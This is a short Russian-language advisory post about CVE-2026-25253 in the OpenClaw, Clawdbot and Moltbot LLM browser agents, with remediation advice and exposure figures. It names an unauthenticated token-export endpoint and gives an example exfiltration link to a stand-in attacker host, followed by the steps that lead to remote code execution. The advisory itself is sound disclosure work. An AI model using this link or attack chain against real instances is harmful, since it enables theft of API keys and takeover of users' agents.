One-Click RCE + unauth API keys leak в OpenClaw/Clawdbot/Moltbot (CVE‑2026‑25253)

Исследователи из Hunt.io разобрали потенциальные последствия эксплуатации уязвимости CVE‑2026‑25253 с оценкой CVSSv3 = 8.8 в OpenClaw и его форках (Clawdbot, Moltbot). Это browser‑automation фреймворки, связывающие LLM с браузером через Playwright. Эти агенты обычно имеют доступ к файловой системе и API‑ключам LLM, что автоматически делает последствия эксплуатации довольно критичными.

🤦 Основная проблема:
1️⃣ Ручка /api/export-auth доступна без аутентификации
2️⃣ Позволяет выгрузить все сохранённые API‑токены провайдеров LLM (OpenAI, Claude, Google AI и др.)

⚙️ Технические детали эксплуатации
OpenClaw до патча:
1️⃣ Читает параметр gatewayUrl из query‑string
2️⃣ Автоматически подключается к нему по WebSocket
3️⃣ Без подтверждения пользователя отправляет auth‑токен на хост атакующего

💫 Сценарий:
1️⃣ Жертва кликает ссылку:
https://victim-openclaw-ui/?gatewayUrl=wss://attacker.com/exfil
2️⃣ OpenClaw сам подключается к WebSocket на хосте атакующего
3️⃣ Токен мгновенно утекает атакующему
4️⃣ Атакующий использует токен для подключения к Gateway API жертвы
5️⃣ Меняет конфигурацию агента
6️⃣ Вызывает привилегированные API → выполнение произвольного кода на хосте

📊 Масштаб последствий
17 500+ публично доступных инстансов в интернете
68.9% — Clawdbot Control
22.3% — Moltbot Control
8.8% — OpenClaw Control

✅ Рекомендации:
1️⃣ Обновиться до версии OpenClaw v2026.1.29
2️⃣ Считать все ключи скомпрометированными, проверить балансы провайдеров LLM, провести ротацию ключей
3️⃣ Использовать естественный интеллект
4️⃣ Не публиковать AI‑агентов в интернет